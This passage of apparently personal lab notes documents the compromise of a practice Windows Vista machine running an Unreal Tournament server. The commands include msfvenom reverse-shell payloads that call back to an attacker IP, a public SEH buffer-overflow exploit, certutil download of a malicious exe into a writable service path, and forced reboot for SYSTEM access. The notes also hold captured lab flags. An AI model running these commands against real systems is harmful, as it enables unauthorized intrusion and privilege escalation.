● Untick “Use global user information”
● Nick name, User name, Password: fluffy
● Close to go back
// Then “Connect” to UT99 server -> “OK”
==========================
* Welcome to MadCowz!
* Welcome to the MadCowz IRC Network fluffy!fluffy@192.168.49.68
* Your host is irc.madcowz.localdomain, running version 2.0
* This server was created 10:20:51 May 10 2015
* irc.madcowz.localdomain 2.0 iosw biklmnopstv bklov
* AWAYLEN=200 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst
CHANNELLEN=64 CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=255
MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 :are supported by this server
* MAXTARGETS=20 MODES=20 NETWORK=MadCowz NICKLEN=31 PREFIX=(ov)@+
STATUSMSG=@+ TOPICLEN=307 VBANLIST WALLCHOPS WALLVOICES :are
supported by this server
* 909AAACD2 :your unique ID
* irc.madcowz.localdomain message of the day
* - Mad Cowz, y0!
* End of message of the day.
* There are 2 users and 0 invisible on 1 servers
* 1 :channels formed
* I have 2 clients and 0 servers
* Current Local Users: 2 Max: 4
* Current Global Users: 2 Max: 4
==========================
// Click “Server” -> Select “Channel List”
-> In this case, it shows nothing, but here only channels with more than 5 users. From the
log above, we see that the Madcowz server has a maximum of 4 users. So change this
value to 1.
-> Then click “Search” to find the channel.
-> We found a channel #ut99. Let's join this channel. Click “Server” -> Select “Join a
channel” and enter “ut99” -> OK
// There are 2 users: daisy and ours fluffy
-> Important message:
Topic for #ut99 is: Fragging since UT99! Unreal Tournament 99 Game Server UP! IP:
*THIS* Port: 7778
// Searchsploit Unreal Tournament
// MSF failed
Unreal Tournament - Remote Buffer Overflow (SEH) |
windows/remote/16145.pl
● Bad characters: 0x00 0x5c
● Maximum shellcode size: 938 bytes
// don’t need to regenerate the payload, just provide the correct arguments
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.68 LPORT=443
EXITFUNC=thread -f perl -b "\x00\x5c"
$ perl 16145.pl 192.168.68.44 7778 192.168.49.68 4445
// get the reverse shell
Local.txt: 649befdd7800f4cc1660d10615d795ca
C:\UnrealTournament\System>systeminfo
systeminfo
Host Name: FLUFFY-PC
OS Name: Microsoftr Windows VistaT Business
OS Version: 6.0.6002 Service Pack 2 Build 6002
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: fluffy
Registered Organization:
Product ID: 89584-OEM-7332141-00029
Original Install Date: 10/1/2015, 5:09:16 AM
System Boot Time: 12/3/2020, 12:01:38 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~3094 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT-08:00) Pacific Time (US & Canada)
Total Physical Memory: 1,023 MB
Available Physical Memory: 510 MB
Page File: Max Size: 2,309 MB
Page File: Available: 1,146 MB
Page File: In Use: 1,163 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\FLUFFY-PC
Hotfix(s): 7 Hotfix(s) Installed.
[01]: KB2305420
[02]: KB2999226
[03]: KB935509
[04]: KB937287
[05]: KB938371
[06]: KB955430
[07]: KB968930
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 192.168.193.44
$ ./windows-exploit-suggester.py --database 2020-11-18-mssb.xls --systeminfo
~/OffSec/Practice/UT99/systeminfo
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 7 hotfix(es) against the 469 potential bulletins(s) with a database of 137
known exploits
[*] there are now 468 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows Vista SP2 64-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k
Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys'
'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ
Integer Overflow (MS16-098)
[*]
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local
WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege
Escalation
[*]
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related
EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-
074), PoC
[*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL
NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*]
[E] MS16-063: Cumulative Security Update for Internet Explorer (3163649) - Critical
[*] https://www.exploit-db.com/exploits/39994/ -- Internet Explorer 11 - Garbage Collector
Attribute Type Confusion (MS16-063), PoC
[*]
[E] MS16-059: Security Update for Windows Media Center (3150220) - Important
[*] https://www.exploit-db.com/exploits/39805/ -- Microsoft Windows Media Center - .MCL
File Processing Remote Code Execution (MS16-059), PoC
[*]
[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*] https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9
JavaScriptStackWalker Memory Corruption (MS15-056)
[*] http://blog.skylined.nl/20161206001.html -- MSIE jscript9 JavaScriptStackWalker
memory corruption
[*]
[E] MS16-032: Security Update for Secondary Logon to Address Elevation of Privile
(3143141) - Important
[*] https://www.exploit-db.com/exploits/40107/ -- MS16-032 Secondary Logon Handle
Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39574/ -- Microsoft Windows 8.1/10 - Secondary
Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032), PoC
[*] https://www.exploit-db.com/exploits/39719/ -- Microsoft Windows 7-10 & Server 2008-
2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell), PoC
[*] https://www.exploit-db.com/exploits/39809/ -- Microsoft Windows 7-10 & Server 2008-
2012 (x32/x64) - Local Privilege Escalation (MS16-032) (C#)
[*]
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) -
Important
[*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local
Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV
Privilege Escalation Exploit (MS16-016) (2), PoC
[*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 -
WebDAV Privilege Escalation (MS16-016) (1), PoC
[*]
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution
(3134228) - Important
[*] Windows 7 SP1 x86 - Privilege Escalation (MS16-014),
https://www.exploit-db.com/exploits/40039/, PoC
[*]
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution
(3124901) - Important
[*] https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!
DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*] https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL
Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
[*]
[E] MS15-134: Security Update for Windows Media Center to Address Remote Code
Execution (3108669) - Important
[*] https://www.exploit-db.com/exploits/38911/ -- Microsoft Windows Media Center Library
Parsing RCE Vulnerability aka self-executing' MCL File, PoC
[*] https://www.exploit-db.com/exploits/38912/ -- Microsoft Windows Media Center Link
File Incorrectly Resolved Reference, PoC
[*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object - 'els.dll'
DLL Planting (MS15-134)
[*] https://code.google.com/p/google-security-research/issues/detail?id=514 -- Microsoft
Office / COM Object DLL Planting with els.dll
[*]
[E] MS15-132: Security Update for Microsoft Windows to Address Remote Code Execution
(3116162) - Important
[*] https://www.exploit-db.com/exploits/38968/ -- Microsoft Office / COM Object DLL
Planting with comsvcs.dll Delay Load of mqrt.dll (MS15-132), PoC
[*] https://www.exploit-db.com/exploits/38918/ -- Microsoft Office / COM Object els.dll
DLL Planting (MS15-134), PoC
[*]
[E] MS15-112: Cumulative Security Update for Internet Explorer (3104517) - Critical
[*] https://www.exploit-db.com/exploits/39698/ -- Internet Explorer 9/10/11 -
CDOMStringDataList::InitFromString Out-of-Bounds Read (MS15-112)
[*]
[E] MS15-111: Security Update for Windows Kernel to Address Elevation of Privilege
(3096447) - Important
[*] https://www.exploit-db.com/exploits/38474/ -- Windows 10 Sandboxed Mount Reparse
Point Creation Mitigation Bypass (MS15-111), PoC
[*]
[E] MS15-102: Vulnerabilities in Windows Task Management Could Allow Elevation of
Privilege (3089657) - Important
[*] https://www.exploit-db.com/exploits/38202/ -- Windows CreateObjectTask
SettingsSyncDiagnostics Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38200/ -- Windows Task Scheduler
DeleteExpiredTaskAfter File Deletion Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38201/ -- Windows CreateObjectTask
TileUserBroker Privilege Escalation, PoC
[*]
[M] MS15-100: Vulnerability in Windows Media Center Could Allow Remote Code
Execution (3087918) - Important
[*] https://www.exploit-db.com/exploits/38195/ -- MS15-100 Microsoft Windows Media
Center MCL Vulnerability, MSF
[*] https://www.exploit-db.com/exploits/38151/ -- Windows Media Center - Command
Execution (MS15-100), PoC
[*]
[E] MS15-097: Vulnerabilities in Microsoft Graphics Component Could Allow Remote Code
Execution (3089656) - Critical
[*] https://www.exploit-db.com/exploits/38198/ -- Windows 10 Build 10130 - User Mode
Font Driver Thread Permissions Privilege Escalation, PoC
[*] https://www.exploit-db.com/exploits/38199/ -- Windows
NtUserGetClipboardAccessToken Token Leak, PoC
[*]
[M] MS15-078: Vulnerability in Microsoft Font Driver Could Allow Remote Code Execution
(3079904) - Critical
[*] https://www.exploit-db.com/exploits/38222/ -- MS15-078 Microsoft Windows Font
Driver Buffer Overflow
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of
Privilege (3057191) - Important
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege
Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k
Exploit, MSF
[*]
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code
Execution (3036220) - Critical
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local
Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege
Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local
Privilege Escalation (MS15-010), PoC
[*]
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) -
Critical
[*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege
(MS14-068), PoC
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution
(3011443) - Critical
[*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML
Application) - Remote Code Execution (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 -
Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation
Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation
Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE
Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE
Package Manager Code Execution, MSF
[*]
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution
(3000869) - Important
[*] http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution
'Sandworm' Exploit (MS14-060), PoC
[*] http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE
Package Manager Code Execution, MSF
[*]
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution
(3000061) - Critical
[*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL
Pointer Dereference, MSF
[*]
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of
Privilege (2975684) - Important
[*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys
Privilege Escalation (MS14-040), PoC
[*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling
Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*] http://www.exploit-db.com/exploits/34458/
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege
(2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote
Command Execution, PoC
[*]
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege
(2916607) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of
Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-096: Vulnerability in Microsoft Graphics Component Could Allow Remote Code
Execution (2908005) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution
(2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code
Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of
Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID
Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID
Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
(2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of
Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution
(2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of
Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
(981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
(977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code
Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow
Remote Code Execution (975254) - Important
[M] MS09-050: Vulnerabilities in SMBv2 Could Allow Remote Code Execution (975517) -
Critical
[*]
https://www.rapid7.com/db/modules/exploit/windows/smb/ms09_050_smb2_negotiate_fun
c_index -- MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table
Dereference
[*]
[*] done
C:\UnrealTournament\System>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
=============== ==============================================
fluffy-pc\daisy S-1-5-21-2166732910-1323509646-2289275227-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============
==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by
default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by
default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group,
Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group,
Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group,
Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by
default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory
group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Unknown SID type S-1-16-8192 Mandatory
group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ====================================
========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\UnrealTournament\System>net user
net user
User accounts for \\FLUFFY-PC
-------------------------------------------------------------------------------
Administrator daisy fluffy
Guest kermit
The command completed successfully.
C:\UnrealTournament\System>net localgroup Administrators
-> fluffy belongs to Administrators group -> should we get shell of this user ???
// Found this exploit: https://www.exploit-db.com/exploits/40485
Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation
C:\UnrealTournament\System>wmic service get
name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\"
| findstr /i /v """
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\
Windows\\" | findstr /i /v """
Foxit Cloud Safe Update Service FoxitCloudUpdateService C:\
Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud\FCUpdateService.exe
Auto
C:\UnrealTournament\System>sc qc "Foxit Cloud Safe Update Service"
sc qc "Foxit Cloud Safe Update Service"
[SC] OpenService FAILED 1060:
The specified service does not exist as an installed service.
C:\UnrealTournament\System>sc qc FoxitCloudUpdateService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: FoxitCloudUpdateService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Foxit Software\Foxit Reader\
Foxit Cloud\FCUpdateService.exe
LOAD_ORDER_GROUP :
TAG :0
DISPLAY_NAME : Foxit Cloud Safe Update Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\UnrealTournament\System>icacls "C:\Program Files (x86)\Foxit Software\Foxit
Reader\Foxit Cloud"
C:\Program Files (x86)\Foxit Software\Foxit Reader\Foxit Cloud NT SERVICE\
TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
C:\UnrealTournament\System>icacls "C:\Program Files (x86)\Foxit Software\Foxit
Reader"
C:\Program Files (x86)\Foxit Software\Foxit Reader fluffy-pc\daisy:(I)(W,Rc,REA,RA)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
-> It seems user daisy can write to "C:\Program Files (x86)\Foxit Software\Foxit
Reader"
// We create a reverse shell in binary, named “Foxit.exe”
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.53 LPORT=4446 -
f exe > Foxit.exe
// Download this binary to “C:\Program Files (x86)\Foxit Software\Foxit Reader”
C:\Program Files (x86)\Foxit Software\Foxit Reader> certutil -urlcache -split -f
http://192.168.49.53/Foxit.exe Foxit.exe
// As we can not manually stop/start the service (START_TYPE : 2 AUTO_START),
we need to restart this machine in the hope of triggering our reverse shell
C:\Program Files (x86)\Foxit Software\Foxit Reader>shutdown /r /t 0
// We get the reverse shell after rebooting the machine
Proof.txt: cf6d948b72c6587110490e6c2f81ec86
C:\UnrealTournament\System>reg query HKLM\Software\Policies\Microsoft\Windows\
Installer
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
ERROR: The system was unable to find the specified registry key or value.
C:\UnrealTournament\System>reg query HKCU\Software\Policies\Microsoft\Windows\
Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
ERROR: The system was unable to find the specified registry key or value.
// Found SQLite database that shows connections to UT99
C:\Users\daisy>type murmur.sqlite